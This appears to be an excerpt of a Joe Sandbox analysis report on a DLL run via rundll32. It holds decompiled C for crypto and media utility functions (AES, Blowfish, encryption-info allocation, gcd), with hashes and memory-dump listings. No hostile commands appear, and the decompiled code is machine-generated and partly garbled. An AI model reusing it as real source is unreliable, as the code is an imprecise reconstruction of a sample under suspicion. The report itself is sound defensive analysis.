Instruction Fuzzy Hash: CE51D374605B069FC750EFA9D480A1AF7F0FF44780F42892CE9998B601DB74F890CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10013480 Relevance: 9.3, APIs: 6, Instructions: 286
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E10013480() {
				int _t125;
				void* _t127;
				void* _t128;
				signed char* _t138;
				signed char _t141;
				signed int _t143;
				void* _t145;
				signed char _t148;
				signed int _t150;
				int _t153;
				int _t154;
				int _t161;
				void _t162;
				signed int _t163;
				void* _t164;
				void _t168;
				signed int _t171;
				int _t172;
				signed int _t175;
				int _t176;
				signed int* _t177;
				int* _t178;
				int _t179;
				int _t182;
				int _t185;
				signed int _t193;
				signed int _t194;
				int _t195;
				signed int _t196;
				int _t198;
				void* _t202;
				signed int _t205;
				int _t206;
				void* _t215;
				void* _t218;
				void* _t222;
				void* _t232;
				void* _t233;
				void* _t234;
				int _t236;
				void* _t239;
				void* _t240;
				signed char* _t246;
				signed int _t247;
				void _t248;
				int* _t249;
				int* _t250;

				_t177 = _t249[0x1c];
				_t125 = _t249[0x1d];
				if(_t177 == 0 || _t125 <= 3) {
					L36:
					_t249[0x12] = 0;
					goto L37;
				} else {
					_t194 =  *_t177;
					_t178 =  &(_t177[1]);
					_t249[0x11] = 0;
					_t127 = _t125 - 4;
					asm("bswap edx");
					_t249[0x10] = _t194;
					if(_t194 != 0 && _t127 > 0xf) {
						_t249[0xa] = 0;
						_t249[0xb] = 0;
						_t249[0x12] = 0;
						while(1) {
							_t195 =  *_t178;
							_t128 = _t127 - 0x10;
							_t249[8] = _t128;
							_t171 = _t178[2];
							_t249[0xc] = _t128;
							_t249[0xd] = 0;
							asm("bswap edx");
							_t249[5] = _t195;
							_t196 = _t178[1];
							asm("bswap ebx");
							asm("bswap edx");
							_t249[0xe] = _t196;
							_t249[6] = _t196;
							_t249[7] = 0;
							_t198 = _t178[3];
							asm("bswap edx");
							_t249[9] = _t198;
							asm("adc edi, edx");
							asm("adc edi, edx");
							asm("sbb eax, edi");
							if(_t249[8] < _t195 + _t198 + _t196 * _t171) {
								break;
							}
							_t249[2] = _t171;
							_t249[0xc] =  &(_t178[4]);
							_t249[3] = _t249[9];
							_t249[1] = _t249[0xe];
							 *_t249 = _t249[5];
							_t138 = E10013100(_t178);
							_t202 = _t249[0xc];
							_t246 = _t138;
							if(_t138 == 0) {
								break;
							}
							if((_t249[0xb] | _t249[0xa]) == 0) {
								_t249[0x12] = _t246;
							} else {
								 *(_t249[0xf] + 0x1c) = _t246;
							}
							_t179 = _t249[5];
							_t232 = _t202;
							_t141 =  *_t246;
							_t215 = _t141;
							if(_t179 >= 8) {
								if((_t141 & 0x00000001) != 0) {
									_t232 = _t202 + 1;
									_t215 = _t215 + 1;
									 *_t141 =  *_t202 & 0x000000ff;
									_t179 = _t249[5] - 1;
								}
								if((_t215 & 0x00000002) != 0) {
									_t143 =  *_t232 & 0x0000ffff;
									_t215 = _t215 + 2;
									_t232 = _t232 + 2;
									_t179 = _t179 - 2;
									 *(_t215 - 2) = _t143;
								}
								if((_t215 & 0x00000004) != 0) {
									_t168 =  *_t232;
									_t215 = _t215 + 4;
									_t232 = _t232 + 4;
									_t179 = _t179 - 4;
									 *(_t215 - 4) = _t168;
								}
							}
							memcpy(_t215, _t232, _t179);
							_t250 =  &(_t249[3]);
							_t145 = _t250[5];
							_t233 = _t202 + _t145;
							_t250[0xc] = _t233;
							_t250[0xf] = _t250[8] - _t145;
							if((_t250[0xe] | _t250[7]) == 0) {
								L19:
								_t172 = _t250[9];
								_t148 = _t246[0x14];
								_t234 = _t250[0xc];
								_t182 = _t172;
								_t218 = _t148;
								if(_t172 >= 8) {
									if((_t148 & 0x00000001) != 0) {
										_t205 =  *_t234 & 0x000000ff;
										_t234 = _t234 + 1;
										_t218 = _t218 + 1;
										_t250[5] = _t205;
										 *_t148 = _t205;
										_t182 = _t250[9] - 1;
									}
									if((_t218 & 0x00000002) != 0) {
										_t150 =  *_t234 & 0x0000ffff;
										_t218 = _t218 + 2;
										_t234 = _t234 + 2;
										_t182 = _t182 - 2;
										 *(_t218 - 2) = _t150;
									}
									if((_t218 & 0x00000004) != 0) {
										_t162 =  *_t234;
										_t218 = _t218 + 4;
										_t234 = _t234 + 4;
										_t182 = _t182 - 4;
										 *(_t218 - 4) = _t162;
									}
								}
								memcpy(_t218, _t234, _t182);
								_t249 =  &(_t250[3]);
								_t206 = _t249[9];
								_t178 = _t249[0xc] + _t206;
								_t127 = _t249[0xf] - _t206;
								_t249[0xa] = _t249[0xa] + 1;
								asm("adc dword [esp+0x2c], 0x0");
								if((_t249[0x11] ^ _t249[0xb] | _t249[0x10] ^ _t249[0xa]) == 0) {
									L37:
									return _t249[0x12];
								} else {
									if(_t127 <= 0xf) {
										_t153 = _t249[0x12];
										if(_t153 == 0) {
											goto L36;
										}
										_t175 = 0;
										_t236 = _t153;
										if( *((intOrPtr*)(_t153 + 0xc)) == 0) {
											L46:
											_t154 = _t249[0x12];
											_t155 =  *((intOrPtr*)(_t154 + 0x1c));
											if( *((intOrPtr*)(_t154 + 0x1c)) != 0) {
												L10012850(_t155);
											}
											_t176 = _t249[0x12];
											 *_t249 =  *_t176;
											L100290D0();
											 *_t249 =  *(_t176 + 8);
											L100290D0();
											 *_t249 =  *(_t176 + 0x14);
											L100290D0();
											 *_t249 = _t176;
											L100290D0();
											goto L36;
										}
										do {
											_t161 =  *( *((intOrPtr*)(_t236 + 8)) + _t175 * 4);
											_t175 = _t175 + 1;
											 *_t249 = _t161;
											L100290D0();
										} while (_t175 <  *((intOrPtr*)(_t236 + 0xc)));
										goto L46;
									}
									_t249[0xf] = _t246;
									continue;
								}
							} else {
								_t250[5] = _t233;
								_t163 = 0;
								_t250[8] = _t246;
								goto L13;
								L13:
								_t185 = _t171;
								_t222 =  *(_t250[8][8] + _t163 * 4);
								_t239 = _t250[5];
								if(_t171 >= 8) {
									if((_t222 & 0x00000001) != 0) {
										_t193 =  *_t239 & 0x000000ff;
										_t222 = _t222 + 1;
										_t239 = _t239 + 1;
										_t250[0x13] = _t193;
										 *(_t222 - 1) = _t193;
										_t185 = _t171 - 1;
									}
									if((_t222 & 0x00000002) != 0) {
										_t247 =  *_t239 & 0x0000ffff;
										_t222 = _t222 + 2;
										_t239 = _t239 + 2;
										_t185 = _t185 - 2;
										 *(_t222 - 2) = _t247;
									}
									if((_t222 & 0x00000004) != 0) {
										_t248 =  *_t239;
										_t222 = _t222 + 4;
										_t239 = _t239 + 4;
										_t185 = _t185 - 4;
										 *(_t222 - 4) = _t248;
									}
								}
								_t164 = memcpy(_t222, _t239, _t185);
								_t250 =  &(_t250[3]);
								_t240 = _t164;
								_t250[5] = _t250[5] + _t171;
								_t163 = _t164 + 1;
								asm("adc edx, 0x0");
								if((_t250[7] ^ 0 | _t250[6] ^ _t163) == 0) {
									_t246 = _t250[8];
									_t250[0xc] = _t250[0xc] + (_t240 + 1) * _t171;
									_t250[0xf] = _t250[0xf] - (_t250[0xe] - 1) * _t171 - _t171;
									goto L19;
								} else {
									goto L13;
								}
							}
						}
						_t133 = _t249[0x12];
						if(_t249[0x12] != 0) {
							L10012850(_t133);
						}
					}
					goto L36;
				}
			}

0x10013487
0x1001348b
0x10013491
0x10013781
0x10013783
0x00000000
0x100134a0
0x100134a0
0x100134a4
0x100134a7
0x100134ab
0x100134ae
0x100134b0
0x100134b6
0x100134c9
0x100134cf
0x100134d3
0x100134e0
0x100134e0
0x100134e2
0x100134e7
0x100134eb
0x100134ee
0x100134f2
0x100134f8
0x100134fa
0x10013500
0x10013503
0x10013505
0x10013507
0x1001350d
0x10013513
0x10013517
0x1001351a
0x1001351c
0x10013528
0x10013532
0x10013538
0x1001353a
0x00000000
0x00000000
0x10013540
0x1001354b
0x1001354f
0x10013557
0x1001355f
0x10013562
0x10013567
0x1001356d
0x1001356f
0x00000000
0x00000000
0x1001357f
0x10013738
0x10013585
0x10013589
0x10013589
0x1001358c
0x10013590
0x10013592
0x10013598
0x1001359a
0x100136ca
0x100137d9
0x100137dc
0x100137dd
0x100137e3
0x100137e3
0x100136d6
0x10013793
0x10013796
0x10013799
0x1001379c
0x1001379f
0x1001379f
0x100136e2
0x100136e8
0x100136ea
0x100136ed
0x100136f0
0x100136f3
0x100136f3
0x100136e2
0x100135a0
0x100135a0
0x100135a2
0x100135a6
0x100135ad
0x100135bb
0x100135bf
0x10013660
0x10013660
0x10013664
0x10013667
0x1001366e
0x10013670
0x10013672
0x10013702
0x100137bd
0x100137c0
0x100137c3
0x100137c4
0x100137c8
0x100137ce
0x100137ce
0x1001370e
0x100137a8
0x100137ab
0x100137ae
0x100137b1
0x100137b4
0x100137b4
0x1001371a
0x10013720
0x10013722
0x10013725
0x10013728
0x1001372b
0x1001372b
0x1001371a
0x10013678
0x10013678
0x1001367a
0x1001368a
0x1001368c
0x10013692
0x10013697
0x100136aa
0x10013787
0x10013792
0x100136b0
0x100136b3
0x100137eb
0x100137f1
0x00000000
0x00000000
0x100137f6
0x100137f8
0x100137fc
0x10013814
0x10013814
0x10013818
0x1001381d
0x1001381f
0x1001381f
0x10013824
0x1001382a
0x1001382d
0x10013835
0x10013838
0x10013840
0x10013843
0x10013848
0x1001384b
0x00000000
0x1001384b
0x10013800
0x10013803
0x10013806
0x10013807
0x1001380a
0x1001380f
0x00000000
0x10013800
0x100136b9
0x00000000
0x100136b9
0x100135c5
0x100135c5
0x100135c9
0x100135cd
0x100135d1
0x100135f6
0x100135fd
0x10013602
0x10013605
0x10013609
0x10013611
0x10013760
0x10013763
0x10013764
0x10013765
0x10013769
0x1001376c
0x1001376c
0x1001361d
0x10013748
0x1001374b
0x1001374e
0x10013751
0x10013754
0x10013754
0x10013629
0x1001362b
0x1001362d
0x10013630
0x10013633
0x10013636
0x10013636
0x10013629
0x100135d8
0x100135d8
0x100135da
0x100135e4
0x100135e8
0x100135eb
0x100135f4
0x1001364c
0x10013650
0x1001365c
0x00000000
0x00000000
0x00000000
0x00000000
0x100135f4
0x100135bf
0x10013774
0x1001377a
0x1001377c
0x1001377c
0x1001377a
0x00000000
0x100134b6

APIs

mv_encryption_init_info_alloc.F086 ref: 10013562

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_encryption_init_info_alloc
String ID:
API String ID: 3189372936-0
Opcode ID: c553b2355f7102cf38e75df9346fe31f6216a4e4802c0632ce5a8ed455da1efe
Instruction ID: 5f2a4f4094cb7a0488fc386a39adfcdd6b5e851adb51ea05a95b9a0d2f55e3bd
Opcode Fuzzy Hash: c553b2355f7102cf38e75df9346fe31f6216a4e4802c0632ce5a8ed455da1efe
Instruction Fuzzy Hash: 44B156B1A083418FC764CF29C58461AFBE2FFC8250F56896DE9899B350E631E981CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1002B0B0 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 267stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 1002B231

Strings

INT64_MIN, xrefs: 1002B3E6
%d:%02d.%06d, xrefs: 1002B220
%d.%06d, xrefs: 1002B413
%lld:%02d:%02d.%06d, xrefs: 1002B386
INT64_MAX, xrefs: 1002B3A6

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strlen
String ID: %d.%06d$%d:%02d.%06d$%lld:%02d:%02d.%06d$INT64_MAX$INT64_MIN
API String ID: 39653677-2240581584
Opcode ID: 11cc0387ba0acaa09a76acaf0e1bd6dd28ec28603ad3855deced5f26615f1bcb
Instruction ID: 43d3ff7a82607b78a247297113464a0dd0228f1a79180d729c91701a74fde06b
Opcode Fuzzy Hash: 11cc0387ba0acaa09a76acaf0e1bd6dd28ec28603ad3855deced5f26615f1bcb
Instruction Fuzzy Hash: CBA16C72A187118FC708CF6DD44061EFBE6EBC8750F598A2EF498D7364D674D9058B82

Uniqueness

Uniqueness Score: -1.00%

Function 10007270 Relevance: 6.3, APIs: 4, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f015b48431e7a80715030cee135de255bbf03b7162adfda3c796d469d01474f6
Instruction ID: 80344777319d5c39256bea2cca684abcfe3cba157365ca00e8d05506c74a31d6
Opcode Fuzzy Hash: f015b48431e7a80715030cee135de255bbf03b7162adfda3c796d469d01474f6
Instruction Fuzzy Hash: 54C19E71A087858FD354CF2D888064EBBE1FFC9294F198A2EF8D8C7355E675D9448B42

Uniqueness

Uniqueness Score: -1.00%

Function 10092180 Relevance: 4.6, APIs: 3, Instructions: 62timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32 ref: 100921A1

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 239ab144a6ce047cfb13d847f2b01901541eb90a974f5925169c811fb4947156
Instruction ID: 7e8eca435f47cc72285f0ff92e2e59cf077fa7250504efb7398187b0f8841556
Opcode Fuzzy Hash: 239ab144a6ce047cfb13d847f2b01901541eb90a974f5925169c811fb4947156
Instruction Fuzzy Hash: FC2139B04093419FDB20EF28D58825ABBF0FF84350F11892DE8D987258E738D584DB52

Uniqueness

Uniqueness Score: -1.00%

Function 100084B0 Relevance: 3.2, APIs: 2, Instructions: 185COMMON

Download Yara Rule

APIs

mv_blowfish_crypt_ecb.F086 ref: 10008642

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_blowfish_crypt_ecb
String ID:
API String ID: 997994871-0
Opcode ID: e25778ea9fdb925930b24f7ee5b61e2c5b198a0ae9bacbd401b09897083a4e10
Instruction ID: d8ffb9ab9be6425fb2f2151958634ca33b63df147d529954a2eeef9d18f7c60e
Opcode Fuzzy Hash: e25778ea9fdb925930b24f7ee5b61e2c5b198a0ae9bacbd401b09897083a4e10
Instruction Fuzzy Hash: 537145B19097818BC709CF29D5C846AFBE1FFC9245F118A5EE8DC87344E270AA04CB62

Uniqueness

Uniqueness Score: -1.00%

Function 100243C0 Relevance: 2.1, APIs: 1, Instructions: 601COMMON

Download Yara Rule

APIs

mv_mod_i.F086 ref: 10024C49

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mod_i
String ID:
API String ID: 416848386-0
Opcode ID: 3d8ce93c5e70e6cdd39acc70d59f7b57e28878e6643059ac4b681878335ad598
Instruction ID: dd13ca78155645af025b07bce56f249e9a9f1717602db99794a3f06de0c2c3b2
Opcode Fuzzy Hash: 3d8ce93c5e70e6cdd39acc70d59f7b57e28878e6643059ac4b681878335ad598
Instruction Fuzzy Hash: F7420872A083A18BD724CF19D05066FF7E2FFC8750F56891EE9D997390DA70A840DB86

Uniqueness

Uniqueness Score: -1.00%

Function 100353B0 Relevance: 1.9, APIs: 1, Instructions: 385COMMON

Download Yara Rule

APIs

mv_gcd.F086 ref: 1003544D

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_gcd
String ID:
API String ID: 2848192316-0
Opcode ID: 94c61de4151f85b2e349843c83d37783726b6990a1d380f2b046a8bb30d58925
Instruction ID: e6b2b5b070de62496659ab70d0058dc1d8b8705572cd85af2ca405c8e7fadc16
Opcode Fuzzy Hash: 94c61de4151f85b2e349843c83d37783726b6990a1d380f2b046a8bb30d58925
Instruction Fuzzy Hash: 5DF1BF75A083508FC358CF2AC48060AFBE6AFC8750F558A2EF998D7361D670E9458F82

Uniqueness

Uniqueness Score: -1.00%

Function 100215D0 Relevance: 1.8, APIs: 1, Instructions: 297COMMON

Download Yara Rule

APIs

mv_pix_fmt_desc_get.F086(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 100215E6

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_pix_fmt_desc_get
String ID:
API String ID: 2427544746-0
Opcode ID: 0249601a095a9487cf98e69da83eb75bdd383411e2ebe0cdbe0f724ec450abf0
Instruction ID: 559f6f707dd61799b0b773c6f5cd064c8ce248da486725d9c35fe17e2713b67a
Opcode Fuzzy Hash: 0249601a095a9487cf98e69da83eb75bdd383411e2ebe0cdbe0f724ec450abf0
Instruction Fuzzy Hash: DBA138387083098FD758DE29E4507ABB7E1EF94390F94463EE866CB780EB31E9458B01

Uniqueness

Uniqueness Score: -1.00%

Function 1001363B Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

mv_encryption_init_info_alloc.F086 ref: 10013562

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_encryption_init_info_alloc
String ID:
API String ID: 3189372936-0
Opcode ID: cd6924afccd7b87e315566fc0b34ac7627ccdbad5b7df46105264a39c2b01be1
Instruction ID: 78d0e82bed4cec982bfd679939fa63163902b3eee1ff480991edcad54221ee49
Opcode Fuzzy Hash: cd6924afccd7b87e315566fc0b34ac7627ccdbad5b7df46105264a39c2b01be1
Instruction Fuzzy Hash: 1951F5B1A087419FC744CF29C58451ABBE2FFC8654F56CA2DF889A7350D731ED458B82

Uniqueness

Uniqueness Score: -1.00%

Function 10002480 Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

APIs

mv_aes_crypt.F086 ref: 10002554

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_aes_crypt
String ID:
API String ID: 1547198422-0
Opcode ID: a76755bfb4d6463656838ecde433fd04cde547babbb3dbb5163c6ebd5a4d3b10
Instruction ID: 6533aa27bc2eace4d46e94b1d96a72d5c0883edd5f4be066e5c3eb9db2eb8fbd
Opcode Fuzzy Hash: a76755bfb4d6463656838ecde433fd04cde547babbb3dbb5163c6ebd5a4d3b10
Instruction Fuzzy Hash: 81419D3510D7C18FD301CF69848054AFFE1FF99288F198A6DE8D993306D260EA09CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 10002523 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

mv_aes_crypt.F086 ref: 10002554

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_aes_crypt
String ID:
API String ID: 1547198422-0
Opcode ID: 3928a72eaf0bdf75db777ef61b97453f1547db555a5c878ed5744eb0c7f909a7
Instruction ID: b15eea7d1e62e16a03610dfd725cbd08b0199710858140edd711ee624ae9ea9b
Opcode Fuzzy Hash: 3928a72eaf0bdf75db777ef61b97453f1547db555a5c878ed5744eb0c7f909a7
Instruction Fuzzy Hash: DC31C47610D7C18FD302CB6990C0099FFE1FF99248F198AADE4DD93706D264EA19CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1000867B Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

mv_blowfish_crypt_ecb.F086 ref: 100086C2

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
